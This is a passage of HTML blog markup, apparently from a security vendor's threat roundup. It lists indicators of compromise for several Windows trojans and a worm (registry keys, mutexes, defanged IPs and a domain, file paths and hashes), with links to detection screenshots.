/&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;185[.]165[.]29[.]36&lt;/li&gt;&lt;li&gt;52[.]173[.]193[.]166&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%TEMP%\CVR9C14.tmp.cvr&lt;/li&gt;&lt;li&gt;\Users\Administrator\Documents\20170605\PowerShell_transcript.PC.Wu4ufN69.20170605030528.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;097de8a240500e67ed2b1b0d8d95a4bcd8f07764c5abdcf7eceb17d15c592611&lt;/li&gt;&lt;li&gt;0cfe5dfa2b53c51076a5ea1aac89e7be91e83a70c6438b037dfd00ccd839ca6f&lt;/li&gt;&lt;li&gt;17b965a0cf6b0b316da2c659ec2c7bbe747819d09c1c1401d5a80272f47b813a&lt;/li&gt;&lt;li&gt;1fa78675658b45f99b1799c11681b3f5b7ec09881f3f600060576b4b0a74a65e&lt;/li&gt;&lt;li&gt;2378d2f333b50cc341e08f574d300ebcf12ee7140cb897620bc9c35f93929854&lt;/li&gt;&lt;li&gt;24384267829131c7158c50c109afea6026d327c65a66ef559a6540c2c8863094&lt;/li&gt;&lt;li&gt;2669d31701a90345db7492bc3de46db51af6a9137ce1bafdab2fd3122d2e040e&lt;/li&gt;&lt;li&gt;27a035174244dd347ee81cc932fccf414b1c32a0820fe6a55e242ee04e9c0686&lt;/li&gt;&lt;li&gt;2a3a0eea64d407c04bf65c3bd1b22c4243435d8b066e44011d1a9904f0f644e7&lt;/li&gt;&lt;li&gt;2de9f4f8df35ca71c1738d22bfb6a147670c25dcbe2014cfd0870a53e33f385a&lt;/li&gt;&lt;li&gt;38e71cd7dba75c6e6dbfa326843d10421d57ab3781c94c1174cfc260c86d4361&lt;/li&gt;&lt;li&gt;3d93b69809ad4d6cb2866583c7fc0144aa0db167fd4940ab17b3252c809bf1d1&lt;/li&gt;&lt;li&gt;3ea1c668e2b904c00f60d3bdd735a31261c49b29a39f2523c03271328a69c580&lt;/li&gt;&lt;li&gt;3f3adeed33a1a057f697c49f9d776c27c7fb9afb7cfa62eec2936ac24ae0d19d&lt;/li&gt;&lt;li&gt;4914a3125bf4d54a07ade2109325a324f813c500a5b6e8a2781b7c1876671455&lt;/li&gt;&lt;li&gt;556556a774b18
7d2068e8d6e4cc2d098fd06fe146e0b4578b68a602d9b9c47f7&lt;/li&gt;&lt;li&gt;56e76f857ba0006ce64a71404b3a5e0166659e069c7d31d488de248e3e8a7af4&lt;/li&gt;&lt;li&gt;5cc180f858ed3148aad169790640664280c4b908867256f7b1a0718575192c78&lt;/li&gt;&lt;li&gt;67e2d24be65f338f944eda6cffdda8013147088a8173e771795b399c3c182771&lt;/li&gt;&lt;li&gt;6b6221926ec36c928f0d0eef2d254766f30342714c3e791645d97c6c86cec31f&lt;/li&gt;&lt;li&gt;73b30d45b7f7a0893f8d8a1b3b55f10ff9d11e86619dccbb22a60d1f2462d5f6&lt;/li&gt;&lt;li&gt;7cc61b02a664bfdeb11daf0dbb6f7bcfa2b07291b4ba3d25e902850a76f91ded&lt;/li&gt;&lt;li&gt;7ec2376443a777c789d853489ba4192ff21923ab95f4810660faad4dd93e0813&lt;/li&gt;&lt;li&gt;7fcd49ea71363a666377a734b80c7608842a9acb868e1b35a3820a1eefd68975&lt;/li&gt;&lt;li&gt;900f2319a95ec33f4c42a4ceac088f0ab940aa0cde64c4da186b0322746d3e36&lt;/li&gt;&lt;li&gt;913b51d636924dc67655ac2bb69449858448f71363eafcd3cb7881da3fe12994&lt;/li&gt;&lt;li&gt;95fd8ea6a9b5778a75b76804ae8c1da2514239598edd1c324f25eb30a93fd715&lt;/li&gt;&lt;li&gt;a3905f5dd2e106d19e260b36d9bdc7946cc8aae0f4343e8d6c7f671d0bdc7921&lt;/li&gt;&lt;li&gt;a57fe946d0e6d5324080ad9625ed5f4cc2720c53cfa8dfc4185cecc9320c8e45&lt;/li&gt;&lt;li&gt;ac1803de8dea5bca07b2eb654f0ce9b013285686014483e6c81ae7235b68e1aa&lt;/li&gt;&lt;li&gt;b08b5eb8f5ab0a2fa8acebaf86bf48653f38b7efed83d88ba6076f0da4af9ace&lt;/li&gt;&lt;li&gt;bb4e1f338f6d5c46d7890aa7eabe929de1467d8760a463c74379d651600638e8&lt;/li&gt;&lt;li&gt;be53a9f3aeca760dfcea58b676db1f687f238e0c6996ec57e36fa6040f43e75e&lt;/li&gt;&lt;li&gt;c3ffe88841a13a6222d667cb7aca8e0d77215b875403f4865ebf199ef64baf9f&lt;/li&gt;&lt;li&gt;c571b06649be9a8d07ae380a7131dd8deba1bee2aa7067557857fee8cbd2c130&lt;/li&gt;&lt;li&gt;ceb3fd6d517aaff2a122df2f9e8ab368cbf1efc8644344d4f228198e90c56399&lt;/li&gt;&lt;li&gt;d6d05984c0d493eb75861c7d56c2cf649fcc912134e7df2894fc8bb3eec8980f&lt;/li&gt;&lt;li&gt;d845e07f961afb0341e8d8da25fc08896bccd09ccc5136e74454308c9f95eff6&lt;/li&gt;&lt;li&gt;e618d44cf1e7d121c9e934b1d530ebc4e830d1dd7d8228ac5b53a455de
f791a9&lt;/li&gt;&lt;li&gt;e90846bb4883914000462df105e679bc4ad05d3d1b0900363dd18eba1aca5c33&lt;/li&gt;&lt;li&gt;eaa3cb0af249967c7d9a66185db3cac7e93196da6281014206b6d0bc0fb7f34c&lt;/li&gt;&lt;li&gt;ef6269b66111c365ef251e4128a286e16c972359ca406a02b6f81fa8b55b1cda&lt;/li&gt;&lt;li&gt;efb1be187c1b7cb674f6912ceec3301da0cc5c993dc3d7d47f4fa7b9c5e80d1b&lt;/li&gt;&lt;li&gt;f6650409983332866425e807dedc231b28a7cd3a468fe9e17be029fda17efe15&lt;/li&gt;&lt;li&gt;fbdee3574019ef790ca4609c0414bf63da402c051351552e3a24f4e325e494e2&lt;/li&gt;&lt;li&gt;ff9b033e0f4d48b6f77ae849cf3a94ea411583ea8c232b1da6fd1bc99d5e40d4&lt;/li&gt;&lt;li&gt;fff62aadd6740b7c1a4b57758f95d5de0cc36e471e6d1ae40ca8141a5845a7eb&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-gI74odWAeYs/WTrU6GJQ1gI/AAAAAAAABDQ/uL_eiO46oUciMXccBAbsdN_oDpNa42CZACLcB/s1600/Doc_Macro_Valyria_6327969_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-gI74odWAeYs/WTrU6GJQ1gI/AAAAAAAABDQ/uL_eiO46oUciMXccBAbsdN_oDpNa42CZACLcB/s400/Doc_Macro_Valyria_6327969_0_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br 
/&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-3RFukyX5_tY/WTrVAfpNdDI/AAAAAAAABDU/HASztvDNtzUQRWRXDgOuHalpHSVSrKM1QCLcB/s1600/Doc_Macro_Valyria_6327969_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1237" height="260" src="https://2.bp.blogspot.com/-3RFukyX5_tY/WTrVAfpNdDI/AAAAAAAABDU/HASztvDNtzUQRWRXDgOuHalpHSVSrKM1QCLcB/s400/Doc_Macro_Valyria_6327969_0_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-JvAUug2-XLI/WTrVD4gRy4I/AAAAAAAABDY/DNOEQwPvDS0ajXHnfMmUFbWBIGFEgAH7QCLcB/s1600/Doc_Macro_Valyria_6327969_0_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="733" data-original-width="919" height="318" src="https://4.bp.blogspot.com/-JvAUug2-XLI/WTrVD4gRy4I/AAAAAAAABDY/DNOEQwPvDS0ajXHnfMmUFbWBIGFEgAH7QCLcB/s400/Doc_Macro_Valyria_6327969_0_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-QaIWFpuRKUw/WTrVJ06KTOI/AAAAAAAABDc/rby5tFObpUsPAry70s7vgGsxMHK7T-1cwCLcB/s1600/Doc_Macro_Valyria_6327969_0_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="442" data-original-width="612" height="288" 
src="https://2.bp.blogspot.com/-QaIWFpuRKUw/WTrVJ06KTOI/AAAAAAAABDc/rby5tFObpUsPAry70s7vgGsxMHK7T-1cwCLcB/s400/Doc_Macro_Valyria_6327969_0_malware.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Loader-6328419-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;GITSecureService&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;LoaderMutex&lt;/li&gt;&lt;li&gt;Local\WininetStartupMutex&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;594e51c5d358d6a691ff2a80dffaddff77c9184ea072e415138c3d41b7c265ca&lt;/li&gt;&lt;li&gt;70df78ea8ee5f9f4561cbb595ca7c2acc982b3a0b7f84017a803e2a0d0494c5a&lt;/li&gt;&lt;li&gt;47bf1580e8407e9825d40348143ee14bb3f7458c32a367ae1a25f3a33a643a4f&lt;/li&gt;&lt;li&gt;503e751cc1c67c0688e92c28e4565de1448756443fdec4a638a019bd63816b33&lt;/li&gt;&lt;li&gt;f228c82dcc233e42f098ef132796985e7e69ab0294e348182ed1fc79f9f49808&lt;/li&gt;&lt;li&gt;6fbf8a11f59e67a96bc1f6afd67fb4b5213f93ca15d75e14bc3b99ca5af37a5d&lt;/li&gt;&lt;li&gt;c703896a92a7912a109336d28dec6dfbf568f8da63c635206d85c72fb2c4aea0&lt;/li&gt;&lt;li&gt;5b5de2fa244760de8a1a301347ab7a646160c257628f24f19d5072ba8d14d3fe&lt;/li&gt;&lt;li&gt;eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23&lt;/li&gt;&lt;li&gt;c8f06a449c4ba38e5f49b188fdddb2b49a5e7dc8716aa1f220c9ee40b06013a6&lt;/li&gt;&lt;li&gt;6ce02da8b29683da3c62719959522227598d38f3fc7eb056807c0fe83f051720&lt;/li&gt;&lt;li&gt;f99385fa291e583b905bc5880a2d7a8789e9ac12d377beff7ab6afeba26f087c&lt;/li&gt;&lt;li&gt;859cbf1bcb8a1d4b9862e9da10b0e7b760c249ee83b01ae93c72176c021693f5&lt;/li&gt;&lt;li&gt;25a60570b487f02fc57962f8fbf1d859f5cff0f8b47f01e57c7ba2d9c9a3c990&lt;/li&gt;&lt;li&gt;23b62deaab5754b330be64cfb4e784cf2ac328356b767bace69a391219d577a5&lt;/li&gt;&lt;li&gt;e9049130d4cee840324995b87d605672570c19e7d3621e1fd639b640876fa575&lt;/li&gt;&lt;li&gt;77b3f7eb328cb5f503bee90e65789a78be85a73977ecdaeb95c558d7bdb192bb&lt;/li&gt;&lt;li&gt;47a17129b7c2337735cad5c8f9694fc2ae5b344a0ca50647c8a5884b240a8587&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" 
src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-n8E_MAp-lrc/WTrVjPSr4RI/AAAAAAAABDg/IcglYepbRHg-GSKwZMGrr9JP0aTCjFmmQCLcB/s1600/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-n8E_MAp-lrc/WTrVjPSr4RI/AAAAAAAABDg/IcglYepbRHg-GSKwZMGrr9JP0aTCjFmmQCLcB/s400/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-e_EN_mnnEnQ/WTrVtUNhnHI/AAAAAAAABDk/DJ9wMsMxVXUnhJeiImtW8nbA5JkTfC0TACLcB/s1600/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="855" data-original-width="742" height="400" src="https://2.bp.blogspot.com/-e_EN_mnnEnQ/WTrVtUNhnHI/AAAAAAAABDk/DJ9wMsMxVXUnhJeiImtW8nbA5JkTfC0TACLcB/s400/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_threatgrid.png" width="346" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://1.bp.blogspot.com/-Lx0G3pNJivE/WTrVyJWsGhI/AAAAAAAABDo/HdvP1kjuSE8gMU3bgsuxwHUyFSosV7PQACLcB/s1600/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="508" data-original-width="1403" height="143" src="https://1.bp.blogspot.com/-Lx0G3pNJivE/WTrVyJWsGhI/AAAAAAAABDo/HdvP1kjuSE8gMU3bgsuxwHUyFSosV7PQACLcB/s400/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Sivis-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\menu_bleacher[1].png&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\z7t0o5cs.default\XUL.mfl&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\resultslist[1].js&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\KB2533523_20160610_170929140-Microsoft .NET Framework 4 Extended-MSP0.txt&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Office\PowerP12.pip&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Favorites\Links\Suggested 
Sites.url&lt;/li&gt;&lt;li&gt;%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\extensions.cache&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Access\System.mdw&lt;/li&gt;&lt;li&gt;%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\mimeTypes.rdf&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Feeds Cache\YB1OPN1Z\desktop.ini&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Cookies\LJOW70BN.txt&lt;/li&gt;&lt;li&gt;%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\content-prefs.sqlite&lt;/li&gt;&lt;li&gt;\AUTOEXEC.BAT&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\view[1].txt&lt;/li&gt;&lt;li&gt;[...]&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c&lt;/li&gt;&lt;li&gt;ccbf43a2ab8074ca4a27952f0f3c052435ffe38cfa4644f63b609f96c978c014&lt;/li&gt;&lt;li&gt;0a08a78e10ffd4c2e176e089e092f3692b94da97457abcfc694082c525335fcf&lt;/li&gt;&lt;li&gt;0c1170f0bd12ecd8b4a507755dff78ea47d9057129d5ae09b2af82287b43664d&lt;/li&gt;&lt;li&gt;7366a0faef62af909a1ef1da05e2cbd1fc9534cbb26e20e90538e043f4517d5c&lt;/li&gt;&lt;li&gt;4e5297e0d0b8c702e6c97fbaeee1f329b2246a046790e0e8adb595f94accf47e&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; 
text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-2etco_P4f8g/WTrYiGyHSZI/AAAAAAAABEI/v-NBFzUKM8k18NVneV6MuJ-CQiwZr0J7ACLcB/s1600/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-2etco_P4f8g/WTrYiGyHSZI/AAAAAAAABEI/v-NBFzUKM8k18NVneV6MuJ-CQiwZr0J7ACLcB/s400/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-u_QQ5LL4D7c/WTrYr9R7dfI/AAAAAAAABEM/B_0D10iE3CIcNda7eHzJEJEOi93EVQPRgCLcB/s1600/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="746" data-original-width="1088" height="273" src="https://1.bp.blogspot.com/-u_QQ5LL4D7c/WTrYr9R7dfI/AAAAAAAABEM/B_0D10iE3CIcNda7eHzJEJEOi93EVQPRgCLcB/s400/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Worm.Fadok-6328944-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;HKU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;BFA31D7B-D1D1-40D5-A90C-A0909FFA0887&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;wxanalytics[.]ru&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\RAC\mls.exe&lt;/li&gt;&lt;li&gt;%AppData%\RAC\svcsc.exe&lt;/li&gt;&lt;li&gt;%AppData%\RAC\svcsc.exe.config&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;03692f096e7fc9ab6bd470f7092ae80cc5dcfbf1dcb2a849dae2a2384e421315&lt;/li&gt;&lt;li&gt;04c679e80175039e07cbbd0b87a9877c297ef7e18d117f8dfa7c30ea42f78de1&lt;/li&gt;&lt;li&gt;056b0bc81124cf9ad6c094092e1f16f2aa96bf7efebcaeaf3830a8a228464a9b&lt;/li&gt;&lt;li&gt;06f89aa03b2e1f070b9fdfafd5356d0eaa1ea840f05ab7189d89f1cb1f70ff66&lt;/li&gt;&lt;li&gt;093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6&lt;/li&gt;&lt;li&gt;0ab690ef09a14798b9deb6cd0c116b8e0ed906b6bac16a05a5ae4bc38cabf467&lt;/li&gt;&lt;li&gt;0cac66a5a16efe52e2e878f5e8f6e34749e049c547ecf18f54955141e13e7058&lt;/li&gt;&lt;li&gt;0f93142998d1c0dddcf008b167f9611e0fc46539f50a35faf8266d71d31ad3e6&lt;/li&gt;&lt;li&gt;0fffda2d0105f10690d1989859deae3d50287474534649605a320f078616d658&lt;/li&gt;&lt;li&gt;148c4618e14a3c30f73dd6f910df6999ea4be2e32818f3747bdae03c175b7c48&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://1.bp.blogspot.com/-S_eu0nSQ_Rk/WTrXQ6Di5xI/AAAAAAAABDw/SXuG2rhqquIF_K0FGIbP18sk6rETTzYlgCLcB/s1600/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-S_eu0nSQ_Rk/WTrXQ6Di5xI/AAAAAAAABDw/SXuG2rhqquIF_K0FGIbP18sk6rETTzYlgCLcB/s400/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-GsQ--tfJMEA/WTrb-p3A4NI/AAAAAAAABE0/TdlE7CQfi9k0jmEgBka4e5vXb8a8-0TGACLcB/s1600/d85f7833-8538-4447-bc81-8137004f8257.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="448" data-original-width="1020" height="175" src="https://3.bp.blogspot.com/-GsQ--tfJMEA/WTrb-p3A4NI/AAAAAAAABE0/TdlE7CQfi9k0jmEgBka4e5vXb8a8-0TGACLcB/s400/d85f7833-8538-4447-bc81-8137004f8257.png" width="400" 